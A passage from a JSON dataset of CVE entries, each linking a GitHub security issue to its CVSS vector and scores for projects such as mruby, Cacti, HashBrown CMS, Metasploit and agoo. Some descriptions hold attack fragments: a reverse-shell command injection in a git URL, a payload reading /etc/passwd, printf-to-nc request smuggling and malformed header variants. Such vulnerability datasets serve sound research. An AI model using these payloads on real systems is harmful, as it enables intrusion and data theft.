  61438. "exploitabilityScore": 1.8
  61439. },
  61440. {
  61441. "CVE_ID": "CVE-2020-6838",
  61442. "Issue_Url_old": "https://github.com/mruby/mruby/issues/4926",
  61443. "Issue_Url_new": "https://github.com/mruby/mruby/issues/4926",
  61444. "Repo_new": "mruby/mruby",
  61445. "Issue_Created_At": "2020-01-10T08:47:38Z",
  61446. "description": "heap use after free in hash_values_at in PATHTAG compile mruby in ubuntu NUMBERTAG bit with ASAN. poc: CODETAG ERRORTAG",
  61447. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  61448. "severity": "CRITICAL",
  61449. "baseScore": 9.8,
  61450. "impactScore": 5.9,
  61451. "exploitabilityScore": 3.9
  61452. },
  61453. {
  61454. "CVE_ID": "CVE-2020-6839",
  61455. "Issue_Url_old": "https://github.com/mruby/mruby/issues/4929",
  61456. "Issue_Url_new": "https://github.com/mruby/mruby/issues/4929",
  61457. "Repo_new": "mruby/mruby",
  61458. "Issue_Created_At": "2020-01-10T08:51:54Z",
  61459. "description": "stack overflow in mrb_str_len_to_dbl in APITAG build mruby in ubuntu NUMBERTAG bit with ASAN poc: CODETAG result: ERRORTAG",
  61460. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  61461. "severity": "CRITICAL",
  61462. "baseScore": 9.8,
  61463. "impactScore": 5.9,
  61464. "exploitabilityScore": 3.9
  61465. },
  61466. {
  61467. "CVE_ID": "CVE-2020-6840",
  61468. "Issue_Url_old": "https://github.com/mruby/mruby/issues/4927",
  61469. "Issue_Url_new": "https://github.com/mruby/mruby/issues/4927",
  61470. "Repo_new": "mruby/mruby",
  61471. "Issue_Created_At": "2020-01-10T08:49:02Z",
  61472. "description": "heap use after free in hash_slice in PATHTAG build mruby in ubuntu NUMBERTAG bit with ASAN poc: CODETAG result: ERRORTAG",
  61473. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  61474. "severity": "CRITICAL",
  61475. "baseScore": 9.8,
  61476. "impactScore": 5.9,
  61477. "exploitabilityScore": 3.9
  61478. },
  61479. {
  61480. "CVE_ID": "CVE-2020-6851",
  61481. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1228",
  61482. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1228",
  61483. "Repo_new": "uclouvain/openjpeg",
  61484. "Issue_Created_At": "2020-01-10T13:00:24Z",
  61485. "description": "Heap buffer overflow in libopenjp2. Hi, I found a heap buffer overflow that affects at least version NUMBERTAG and current master APITAG On a regular build of openjpeg (in my case, the one shipped by Arch Linux), it leads to a crash; when building the project with address sanitizer, I get the following report: ERRORTAG For the report, I built with Clang NUMBERTAG on Debian stable, using APITAG and APITAG , and calling APITAG with APITAG . The crashing input is available here FILETAG ~seba/openjpeg_poc . Since I believe this may be exploitable, I would like to request a CVE. Let me know if I can help with more information. Thank you!",
  61486. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  61487. "severity": "HIGH",
  61488. "baseScore": 7.5,
  61489. "impactScore": 3.6,
  61490. "exploitabilityScore": 3.9
  61491. },
  61492. {
  61493. "CVE_ID": "CVE-2020-6860",
  61494. "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/96",
  61495. "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/96",
  61496. "Repo_new": "hoene/libmysofa",
  61497. "Issue_Created_At": "2020-01-10T09:56:42Z",
  61498. "description": "Stack Buffer Overflow in mysofa2json. We found a Stack Buffer Overflow in the mysofa2json binary; mysofa2json is compiled with clang with ASAN enabled. Machine Setup APITAG POC : FILETAG ASAN Output ERRORTAG",
  61499. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61500. "severity": "HIGH",
  61501. "baseScore": 8.8,
  61502. "impactScore": 5.9,
  61503. "exploitabilityScore": 2.8
  61504. },
  61505. {
  61506. "CVE_ID": "CVE-2020-6948",
  61507. "Issue_Url_old": "https://github.com/HashBrownCMS/hashbrown-cms/issues/326",
  61508. "Issue_Url_new": "https://github.com/hashbrowncms/hashbrown-cms/issues/326",
  61509. "Repo_new": "hashbrowncms/hashbrown-cms",
  61510. "Issue_Created_At": "2020-01-12T08:00:45Z",
  61511. "description": "remote code execution vulnerability. In file PATHTAG await APITAG clone ' + url + ' ' + APITAG + ' '); The url, username, password and other parameters accept value without proper security check. If I set the git url to something like APITAG $(bash c 'bash i >& PATHTAG NUMBERTAG then when click media to trigger gitpull I can get a reverse shell.",
  61512. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  61513. "severity": "CRITICAL",
  61514. "baseScore": 9.8,
  61515. "impactScore": 5.9,
  61516. "exploitabilityScore": 3.9
  61517. },
  61518. {
  61519. "CVE_ID": "CVE-2020-6949",
  61520. "Issue_Url_old": "https://github.com/HashBrownCMS/hashbrown-cms/issues/327",
  61521. "Issue_Url_new": "https://github.com/hashbrowncms/hashbrown-cms/issues/327",
  61522. "Repo_new": "hashbrowncms/hashbrown-cms",
  61523. "Issue_Created_At": "2020-01-12T08:14:48Z",
  61524. "description": "vulnerability that editor user can change admin user's password. editor role user can change admin user's properties including password hash, salt and token. let's say you have NUMBERTAG users in db id name isadmin hash NUMBERTAG admin true aaaaaa NUMBERTAG editor false bbbbbb editor user can use the postuser function to change his password. Attacker can use this function to change the id and other parameters. If editor changed the id to NUMBERTAG post body)which belong to admin, then he can send another postuser request (set to NUMBERTAG in both post body and url) to overwrite admin's properties (since findone by id NUMBERTAG matches first row now) including hash, token and salt, also changed isadmin to false, static APITAG res) { let id = APITAG let properties = APITAG APITAG APITAG .then((user) => { let APITAG = APITAG 'users'); if(user.id == id || APITAG { // If the current user does not have the \"users\" scope, revert any sensitive properties APITAG { APITAG = APITAG APITAG = false; } return APITAG } return APITAG APITAG \"' + APITAG + '\" does not have scope \"user\"')); }) APITAG => { APITAG properties); <<<<<< accept id, and password value",
  61525. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  61526. "severity": "HIGH",
  61527. "baseScore": 8.8,
  61528. "impactScore": 5.9,
  61529. "exploitabilityScore": 2.8
  61530. },
  61531. {
  61532. "CVE_ID": "CVE-2020-6950",
  61533. "Issue_Url_old": "https://github.com/eclipse-ee4j/mojarra/issues/4571",
  61534. "Issue_Url_new": "https://github.com/eclipse-ee4j/mojarra/issues/4571",
  61535. "Repo_new": "eclipse-ee4j/mojarra",
  61536. "Issue_Created_At": "2019-05-12T13:33:12Z",
  61537. "description": "Multiple Path Traversal security issues. There are a couple of places that allow manipulating resource requests to disclose arbitrary files under the application context. These are tested with Mojarra NUMBERTAG and work under the default configuration NUMBERTAG Resource contracts APITAG URLTAG . Under a branch condition, the contract name is fetched from an http parameter and doesn't go through any filtering. The resource base path is later concatenated from it and can be abused to return an unwanted resource like PATHTAG Another place that has the same vulnerable code is APITAG URLTAG NUMBERTAG Locale prefix The patch for URLTAG is incomplete. APITAG after the check URLTAG still contains tainted data and if the application doesn't declare APITAG in a resource bundle, the application still continues to return that tainted input.",
  61538. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  61539. "severity": "MEDIUM",
  61540. "baseScore": 6.5,
  61541. "impactScore": 3.6,
  61542. "exploitabilityScore": 2.8
  61543. },
  61544. {
  61545. "CVE_ID": "CVE-2020-6958",
  61546. "Issue_Url_old": "https://github.com/NationalSecurityAgency/ghidra/issues/943",
  61547. "Issue_Url_new": "https://github.com/nationalsecurityagency/ghidra/issues/943",
  61548. "Repo_new": "nationalsecurityagency/ghidra",
  61549. "Issue_Created_At": "2019-08-27T14:21:52Z",
  61550. "description": "XXE Vulnerability in APITAG of YAJSW affects Ghidra Server. Describe the bug XXE vulnerability in YAJSW\u2019s APITAG affects Ghidra Server. An insecure way to parse XML input was found in APITAG class from Yet Another Java Service Wrapper used by Ghidra (up to latest version). To Reproduce Steps to reproduce the behavior NUMBERTAG Create an XXE payload file and set the extension of the file to \".jnlp NUMBERTAG Go to PATHTAG NUMBERTAG Modify \"WRAPPER_CONF\" value to point to the \".jnlp\" file NUMBERTAG Run APITAG using \"$ sudo APITAG start NUMBERTAG E exploit in the \".jnlp\" file gets executed Expected behavior Extended XML Entities should be disabled. Environment (please complete the following information): OS: Kali Linux, Debian NUMBERTAG kali NUMBERTAG Java Version NUMBERTAG Ghidra Version NUMBERTAG Additional context I understand the vulnerable code is actually part of a separate library, however I considered this of interest and I suggest adding a filter so no \".jnlp\" configuration files are allowed as values for \"WRAPPER_CONF\", at least until YAJSW patches this problem. More APITAG FILETAG",
  61551. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  61552. "severity": "CRITICAL",
  61553. "baseScore": 9.1,
  61554. "impactScore": 5.2,
  61555. "exploitabilityScore": 3.9
  61556. },
  61557. {
  61558. "CVE_ID": "CVE-2020-7041",
  61559. "Issue_Url_old": "https://github.com/adrienverge/openfortivpn/issues/536",
  61560. "Issue_Url_new": "https://github.com/adrienverge/openfortivpn/issues/536",
  61561. "Repo_new": "adrienverge/openfortivpn",
  61562. "Issue_Created_At": "2020-01-14T13:12:17Z",
  61563. "description": "Security Contact. Dear mantainers, As part of my work at APITAG Security Lab, I have identified some security issues in openfortivpn and I would like to know the preferred way of communicating said issues. Best regards.",
  61564. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  61565. "severity": "MEDIUM",
  61566. "baseScore": 5.3,
  61567. "impactScore": 1.4,
  61568. "exploitabilityScore": 3.9
  61569. },
  61570. {
  61571. "CVE_ID": "CVE-2020-7054",
  61572. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/200",
  61573. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/200",
  61574. "Repo_new": "mz-automation/libiec61850",
  61575. "Issue_Created_At": "2020-01-12T17:21:08Z",
  61576. "description": "heap overflow when parsing APITAG in APITAG in PATHTAG When libiec NUMBERTAG parsing type APITAG , it doesn't check variable APITAG . So we can provide a larger number for APITAG , then memory copy from buffer + APITAG NUMBERTAG lead to heap overflow. APITAG poc: FILETAG result: ERRORTAG",
  61577. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61578. "severity": "HIGH",
  61579. "baseScore": 8.8,
  61580. "impactScore": 5.9,
  61581. "exploitabilityScore": 2.8
  61582. },
  61583. {
  61584. "CVE_ID": "CVE-2020-7058",
  61585. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3186",
  61586. "Issue_Url_new": "https://github.com/cacti/cacti/issues/3186",
  61587. "Repo_new": "cacti/cacti",
  61588. "Issue_Created_At": "2020-01-14T22:53:20Z",
  61589. "description": "Critical: Remote Code Execution via string/command type Input String. Describe the bug Input validation error in FILETAG leads to Remote Code Execution via Input String APITAG edit actions. By default, Cacti was installed with several Data Input Methods. Some of them was created using APITAG input type. An attacker will be able to edit the Input String to insert malicious code and take control of the server. To Reproduce Steps to reproduce the behavior NUMBERTAG After logged in, navigate to Data Collection > Data Input Methods > Unix Ping Host NUMBERTAG By default, Input String was specified as: APITAG . Let's append a malicious perl script in front of current script: CODETAG NUMBERTAG By default, Unix Ping Host data input method is being used by Unix Ping Latency Graph template. This means we can create Unix Ping Latency in current device and gain Remote Code Execution Expected behavior By default, Ping Host works as a feature to check if a host is up/down. With the malicious code appended into the Input String, the server will make a call back to Attacker's machine first. Screenshots If applicable, add screenshots to help explain your problem. Malicious code: URLTAG Create new graph in device: URLTAG Reverse shell connection: URLTAG Desktop (please complete the following information): OS: Kali Linux, Ubuntu Browser : Firefox, Chrome Version: Firefo NUMBERTAG Chrome NUMBERTAG Remediation I would think about two NUMBERTAG solutions NUMBERTAG Using regex to catch all other strings different from expected string NUMBERTAG Hard coding perl script into source code and force the application to take only NUMBERTAG filtered input (hostname). Chi Tran research APITAG",
  61590. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  61591. "severity": "HIGH",
  61592. "baseScore": 8.8,
  61593. "impactScore": 5.9,
  61594. "exploitabilityScore": 2.8
  61595. },
  61596. {
  61597. "CVE_ID": "CVE-2020-7105",
  61598. "Issue_Url_old": "https://github.com/redis/hiredis/issues/747",
  61599. "Issue_Url_new": "https://github.com/redis/hiredis/issues/747",
  61600. "Repo_new": "redis/hiredis",
  61601. "Issue_Created_At": "2020-01-09T21:34:41Z",
  61602. "description": "Several potential null pointer dereferencing. The following code never aborts when malloc is unsuccessful, causing dereferencing of null pointers. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  61603. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  61604. "severity": "HIGH",
  61605. "baseScore": 7.5,
  61606. "impactScore": 3.6,
  61607. "exploitabilityScore": 3.9
  61608. },
  61609. {
  61610. "CVE_ID": "CVE-2020-7106",
  61611. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3191",
  61612. "Issue_Url_new": "https://github.com/cacti/cacti/issues/3191",
  61613. "Repo_new": "cacti/cacti",
  61614. "Issue_Created_At": "2020-01-15T19:15:24Z",
  61615. "description": "Data source. Describe the bug A clear and concise description of what the bug is. To Reproduce Steps to reproduce the behavior NUMBERTAG Go to NUMBERTAG Click on NUMBERTAG Scroll down to NUMBERTAG See error Expected behavior A clear and concise description of what you expected to happen. Screenshots If applicable, add screenshots to help explain your problem. Desktop (please complete the following information): OS: [e.g. iOS] Browser [e.g. chrome, safari] Version [e.g NUMBERTAG Smartphone (please complete the following information): Device: [e.g. APITAG OS: [e.g. iOS NUMBERTAG Browser [e.g. stock browser, safari] Version [e.g NUMBERTAG Additional context Add any other context about the problem here.",
  61616. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  61617. "severity": "MEDIUM",
  61618. "baseScore": 6.1,
  61619. "impactScore": 2.7,
  61620. "exploitabilityScore": 2.8
  61621. },
  61622. {
  61623. "CVE_ID": "CVE-2020-7218",
  61624. "Issue_Url_old": "https://github.com/hashicorp/nomad/issues/7002",
  61625. "Issue_Url_new": "https://github.com/hashicorp/nomad/issues/7002",
  61626. "Repo_new": "hashicorp/nomad",
  61627. "Issue_Created_At": "2020-01-28T19:12:17Z",
  61628. "description": "Reserved Issue Number. TBD",
  61629. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  61630. "severity": "HIGH",
  61631. "baseScore": 7.5,
  61632. "impactScore": 3.6,
  61633. "exploitabilityScore": 3.9
  61634. },
  61635. {
  61636. "CVE_ID": "CVE-2020-7219",
  61637. "Issue_Url_old": "https://github.com/hashicorp/consul/issues/7159",
  61638. "Issue_Url_new": "https://github.com/hashicorp/consul/issues/7159",
  61639. "Repo_new": "hashicorp/consul",
  61640. "Issue_Created_At": "2020-01-28T23:54:20Z",
  61641. "description": "Reserved Issue Number.",
  61642. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  61643. "severity": "HIGH",
  61644. "baseScore": 7.5,
  61645. "impactScore": 3.6,
  61646. "exploitabilityScore": 3.9
  61647. },
  61648. {
  61649. "CVE_ID": "CVE-2020-7226",
  61650. "Issue_Url_old": "https://github.com/vt-middleware/cryptacular/issues/52",
  61651. "Issue_Url_new": "https://github.com/vt-middleware/cryptacular/issues/52",
  61652. "Repo_new": "vt-middleware/cryptacular",
  61653. "Issue_Created_At": "2020-01-19T15:37:20Z",
  61654. "description": "Denial of Service in latest version NUMBERTAG Please confirm if it is a serurity vulnerability. Mitre id: CVETAG Reporter: findneo > APITAG description] > APITAG in > Cryptacular NUMBERTAG as used in Apereo CAS and other products, allows > attackers to trigger excessive memory allocation during a decode > operation, because the nonce array length associated with \"new byte\" may > depend on untrusted input within the header of encoded data. > > > > APITAG Information] > any encoded network communication based on > APITAG APITAG is affected. xxx of > new byte[xxx] can be controlled by client and can be up to NUMBERTAG ffffffd > ,which caused NUMBERTAG G of memory consuming without demanding for any > privilege. > > one of the products using this vuln code is APITAG > login flow of cas NUMBERTAG based on > APITAG APITAG APITAG > speaking,the affected code is > APITAG decode > > besides,codebase for cas NUMBERTAG is URLTAG > > > > APITAG Other] > Denial of Service > > > > APITAG of Product] > FILETAG > > > > APITAG Product Code Base] > cryptacular NUMBERTAG APITAG Component] > APITAG APITAG , > URLTAG > > > > APITAG Type] > Remote > > > > APITAG Denial of Service] > true > > > > APITAG Vectors] > a crafted header of encoded data. > e.g PATHTAG >",
  61655. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  61656. "severity": "HIGH",
  61657. "baseScore": 7.5,
  61658. "impactScore": 3.6,
  61659. "exploitabilityScore": 3.9
  61660. },
  61661. {
  61662. "CVE_ID": "CVE-2020-7229",
  61663. "Issue_Url_old": "https://github.com/niteosoft/simplejobscript/issues/7",
  61664. "Issue_Url_new": "https://github.com/niteosoft/simplejobscript/issues/7",
  61665. "Repo_new": "niteosoft/simplejobscript",
  61666. "Issue_Created_At": "2020-01-10T14:55:41Z",
  61667. "description": "SQL injection in search function. Description: APITAG is vulnerable to SQL injection in the search function. Environment: Version NUMBERTAG OS: Ubuntu NUMBERTAG Web server: Apache NUMBERTAG PHP NUMBERTAG Database: APITAG NUMBERTAG URL: /searched Payload: APITAG Steps to Reproduce: CODETAG APITAG FILETAG",
  61668. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  61669. "severity": "CRITICAL",
  61670. "baseScore": 9.8,
  61671. "impactScore": 5.9,
  61672. "exploitabilityScore": 3.9
  61673. },
  61674. {
  61675. "CVE_ID": "CVE-2020-7237",
  61676. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/3201",
  61677. "Issue_Url_new": "https://github.com/cacti/cacti/issues/3201",
  61678. "Repo_new": "cacti/cacti",
  61679. "Issue_Created_At": "2020-01-19T06:04:29Z",
  61680. "description": "Vulnerability Report: Remote Code Execution due to input validation in Performance Boost Debug Log. Describe the bug An input validation error found in Boost Debug Log field leads to Remote Code Execution. To Reproduce Steps to reproduce the behavior NUMBERTAG Navigate to Console > Configuration > Settings > Performance NUMBERTAG In Boost Debug Log field, type in the payload: APITAG NUMBERTAG Save. Even the $input_whitelisting in FILETAG is ON, it would still accept this payload NUMBERTAG Wait a little bit until new polling cycle gets fetched. Navigate to APITAG to see /etc/passwd content. Screenshots Payload FILETAG Successfully saved the payload FILETAG /etc/passwd content FILETAG Root cause Not like other fields in Configuration tab, Boost Debug Log would still be saved even if the input contains special characters. Tracing back to server log, I observed that this is being handled by FILETAG where it gets fetched by the poller process. Taking a look at the FILETAG , I observed that there are NUMBERTAG different arguments that can be used to passed into its command. Hence, we can use either debug, force, verbose, version, or help to pass into Boost Debug Log field. After crafting a payload, the script will look like: /bin/php FILETAG verbose; cat /etc/passswd > FILETAG where it gets fetched by the new poller process and create FILETAG in webroot. Remediation Apply a check on this field (i.e: input length, input characters) If this field is supposed to take these mentioned arguments, create a drop down menu instead of string field if possible. Please let me know if you need any further information. Chi Tran",
  61681. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  61682. "severity": "HIGH",
  61683. "baseScore": 8.8,
  61684. "impactScore": 5.9,
  61685. "exploitabilityScore": 2.8
  61686. },
  61687. {
  61688. "CVE_ID": "CVE-2020-7238",
  61689. "Issue_Url_old": "https://github.com/jdordonezn/CVE-2020-72381/issues/1",
  61690. "Issue_Url_new": "https://github.com/jdordonezn/cve-2020-72381/issues/1",
  61691. "Repo_new": "jdordonezn/cve-2020-72381",
  61692. "Issue_Created_At": "2020-01-26T19:58:20Z",
  61693. "description": "HTTP Request Smuggling in Netty APITAG Netty APITAG allows HTTP Request Smuggling because it mishandles Transfer Encoding whitespace (such as a FILETAG Normal request FILETAG Processing of netty FILETAG",
  61694. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  61695. "severity": "HIGH",
  61696. "baseScore": 7.5,
  61697. "impactScore": 3.6,
  61698. "exploitabilityScore": 3.9
  61699. },
  61700. {
  61701. "CVE_ID": "CVE-2020-7350",
  61702. "Issue_Url_old": "https://github.com/rapid7/metasploit-framework/issues/13026",
  61703. "Issue_Url_new": "https://github.com/rapid7/metasploit-framework/issues/13026",
  61704. "Repo_new": "rapid7/metasploit-framework",
  61705. "Issue_Created_At": "2020-03-04T17:31:41Z",
  61706. "description": "possible vulnerability in libnotify. the plugin libnotify has a command injection vulnerability which could be triggered when the client imports info as hostnames or services specially crafted from another tool The impact is low because is not possible to tamper the hostname when the client runs a scan with nmap for example in the libnotify's callback of db_host: APITAG if we could tamper the field os_name, this data lands in a call to system in notify send in order to display the notification APITAG Steps to reproduce How'd you do it NUMBERTAG load the plugin: APITAG NUMBERTAG Now if we import the hosts' info from another tool (as faraday, openvas or nessus) and we don't have limitations in the hostname field, the importer plugin will run our field without sanitizing the plugin will run something similar to: CODETAG in this case, I made a little APITAG running a reverse shell in another port the impact is really low because tools as nmap filter the hostname based on the fingerprint of the OS so is not easy to trigger the bug in a scan for example, but in a plugin importer could be fit",
  61707. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  61708. "severity": "HIGH",
  61709. "baseScore": 7.8,
  61710. "impactScore": 5.9,
  61711. "exploitabilityScore": 1.8
  61712. },
  61713. {
  61714. "CVE_ID": "CVE-2020-7376",
  61715. "Issue_Url_old": "https://github.com/rapid7/metasploit-framework/issues/14008",
  61716. "Issue_Url_new": "https://github.com/rapid7/metasploit-framework/issues/14008",
  61717. "Repo_new": "rapid7/metasploit-framework",
  61718. "Issue_Created_At": "2020-08-17T10:00:48Z",
  61719. "description": "PATHTAG permits remote command execution on Metasploit host. On the victim soon to be attacker host create some fun executables : ERRORTAG CODETAG On the attacker soon to be the victim host start a multi handler like any other day: ERRORTAG On the victim soon to be attacker host give the \"attacker\" a shell in a root user namespace: ERRORTAG On the attacker soon to be the victim host enjoy the new shell and enumerate some host info with APITAG (also check there's no funny cron jobs or anything listening on APITAG , because that would be bad) : ERRORTAG On the victim soon to be the attacker host: CODETAG After patch NUMBERTAG ERRORTAG",
  61720. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  61721. "severity": "CRITICAL",
  61722. "baseScore": 9.8,
  61723. "impactScore": 5.9,
  61724. "exploitabilityScore": 3.9
  61725. },
  61726. {
  61727. "CVE_ID": "CVE-2020-7377",
  61728. "Issue_Url_old": "https://github.com/rapid7/metasploit-framework/issues/14015",
  61729. "Issue_Url_new": "https://github.com/rapid7/metasploit-framework/issues/14015",
  61730. "Repo_new": "rapid7/metasploit-framework",
  61731. "Issue_Created_At": "2020-08-18T08:48:55Z",
  61732. "description": "PATHTAG ERRORTAG method is vulnerable to directory traversal resulting in arbitrary file write on the Metasploit host. The ERRORTAG method in the APITAG module is vulnerable to directory traversal resulting in arbitrary file write. This can be used to achieve remote command execution on the Metasploit host from a remote malicious webserver masquerading as a Telpho NUMBERTAG system. Vulnerable Code ERRORTAG APITAG ERRORTAG",
  61733. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  61734. "severity": "HIGH",
  61735. "baseScore": 7.5,
  61736. "impactScore": 3.6,
  61737. "exploitabilityScore": 3.9
  61738. },
  61739. {
  61740. "CVE_ID": "CVE-2020-7661",
  61741. "Issue_Url_old": "https://github.com/kevva/url-regex/issues/70",
  61742. "Issue_Url_new": "https://github.com/kevva/url-regex/issues/70",
  61743. "Repo_new": "kevva/url-regex",
  61744. "Issue_Created_At": "2020-04-26T22:13:22Z",
  61745. "description": "CORE BUG + SECURITY VULNERABILITY Parsing a long String will result in NUMBERTAG CPU usage and APITAG will never finish. Example: `sh > require('url regex')({ strict: false APITAG",
  61746. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  61747. "severity": "HIGH",
  61748. "baseScore": 7.5,
  61749. "impactScore": 3.6,
  61750. "exploitabilityScore": 3.9
  61751. },
  61752. {
  61753. "CVE_ID": "CVE-2020-7670",
  61754. "Issue_Url_old": "https://github.com/ohler55/agoo/issues/88",
  61755. "Issue_Url_new": "https://github.com/ohler55/agoo/issues/88",
  61756. "Repo_new": "ohler55/agoo",
  61757. "Issue_Created_At": "2020-05-16T00:01:28Z",
  61758. "description": "Protect agains smuggling attacks. Testbed used to verify the vulnerability: URLTAG The following requests can be send via command line (tested on ubuntu) to reproduce the behaviour Double Content Length Headers printf 'GET /hello HTTP NUMBERTAG APITAG Length NUMBERTAG APITAG Length NUMBERTAG APITAG APITAG '\\ ' '\\ 'GET /smuggle HTTP NUMBERTAG APITAG APITAG '\\ ' ' | nc APITAG NUMBERTAG Invalid Transfer Encoding Header printf 'POST / HTTP NUMBERTAG APITAG '\\ APITAG ENCODING: chunked '\\ APITAG Type: application/x www form urlencoded NUMBERTAG nc APITAG NUMBERTAG Agoo allows multiple malformed variations of the Transfer Encoding header A request with Content Length and malformed Transfer encoding headers that can be sent to a backend server and conduct CL:TE attacks. ( URLTAG POST /hello HTTP NUMBERTAG Host: APITAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Transfer Encoding : chunked NUMBERTAG In the above example, the request is sent with the Transfer encoding header having extra spaces APITAG Encoding : chunked). This is in violation of RFC NUMBERTAG Agoo was also found to allow multiple variations of bad transfer encoding headers including CRLF characters, Fake Transfer encoding etc. APITAG TE.TE behavior: obfuscating the TE header section: URLTAG Some other examples that is allowed: Transfer Encoding: chunk Transfer Encoding: ch\u2013nked Transfer Encoding:\u00ffchunked Transfer Encoding:chunked tRANSFER ENCODING: chunked [space APITAG Encoding: chunked Transfer Encoding: chunked Transfer Encoding:chunked Transfer Encoding: \"chunked\" Transfer Encoding : chunked Transfer Encoding: chunked The above is proof of concept which just demonstrates the behaviour. Depending on how Algoo will be used as part of a chain of servers, this could result in a successful request smuggling attack. I am happy to provide more information regarding a successful attack. \nRemediation The best solution to remediate this vulnerability is to do the following: Disallow requests with double content lengths headers Ensure malformed Transfer encoding headers are not allowed. This can be done via rejecting the request and sending a NUMBERTAG back to the HTTP client As per RFC NUMBERTAG FILETAG When requests with both Content Length and Transfer encoding header is sent, the Content Length header should be ignored Remediation for the following open source projects can be used as a reference. The above points were taken from that. \u2022 URLTAG \u2022 URLTAG \u2022 URLTAG",
  61759. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  61760. "severity": "HIGH",
  61761. "baseScore": 7.5,
  61762. "impactScore": 3.6,
  61763. "exploitabilityScore": 3.9
  61764. },
  61765. {
  61766. "CVE_ID": "CVE-2020-7671",
  61767. "Issue_Url_old": "https://github.com/postrank-labs/goliath/issues/351",
  61768. "Issue_Url_new": "https://github.com/postrank-labs/goliath/issues/351",
  61769. "Repo_new": "postrank-labs/goliath",
  61770. "Issue_Created_At": "2020-06-02T19:56:15Z",
  61771. "description": "HTTP Request Smuggling Hardening. Posting it here for community patches after talking with the maintainers privately. Issue: Goliath doesn't prevent Request Smuggling attacks NUMBERTAG Goliath allows requests with multiple content lengths. When sent a request such as the below, the first content length header is ignored and the second content length header is prioritized. Since the second content length was set to zero, the backend will expect no request body and the /smuggledreq request is treated as another pipelined request. APITAG CODETAG NUMBERTAG Goliath allows multiple malformed variations of the Transfer Encoding header. Depending on how Goliath will be used as part of a chain of servers, this could result in a successful request smuggling attack. ERRORTAG Other examples: ERRORTAG How to fix: Prioritize Transfer Encoding over Content Length Remediation: This remediation will prevent CL:TE and TE:CL attacks Details: When a request with both a Transfer Encoding: chunked header and Content length is received, the transfer encoding header should be prioritized over Content Length. This is referenced in RFC NUMBERTAG Section NUMBERTAG Disallow requests with Double Content Length Remediation: This remediation will prevent CL:CL attacks Details: As mentioned in RFC NUMBERTAG Section NUMBERTAG if a HTTP request is received with multiple content length headers with different length values, this should be responded with a HTTP NUMBERTAG response. Disallow malformed Transfer encoding headers Remediation: This remediation will prevent TE:TE attacks. Details: If both a frontend and backend prioritizes the Transfer Encoding header, it could allow smuggling attacks where an attacker inserts two Transfer Encoding headers, one which would be ignored by the frontend and is processed by the backend and vice versa. As such, the following type of header variations should be rejected. \nMore examples of header variations can be seen here: URLTAG Disallow requests with both Content length and Transfer encoding Remediation: This remediation will prevent CL:TE and TE:CL attacks Details: This can be seen as a better alternative to APITAG Transfer Encoding over Content Length\u201d solution. Runtime platforms such as FILETAG have used this solution to remediate against request smuggling where any requests with both headers are returned with a HTTP NUMBERTAG response.",
  61772. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  61773. "severity": "HIGH",
  61774. "baseScore": 7.5,
  61775. "impactScore": 3.6,
  61776. "exploitabilityScore": 3.9
  61777. },
  61778. {
  61779. "CVE_ID": "CVE-2020-7680",
  61780. "Issue_Url_old": "https://github.com/docsifyjs/docsify/issues/1126",
  61781. "Issue_Url_new": "https://github.com/docsifyjs/docsify/issues/1126",
  61782. "Repo_new": "docsifyjs/docsify",
  61783. "Issue_Created_At": "2020-04-19T19:19:47Z",
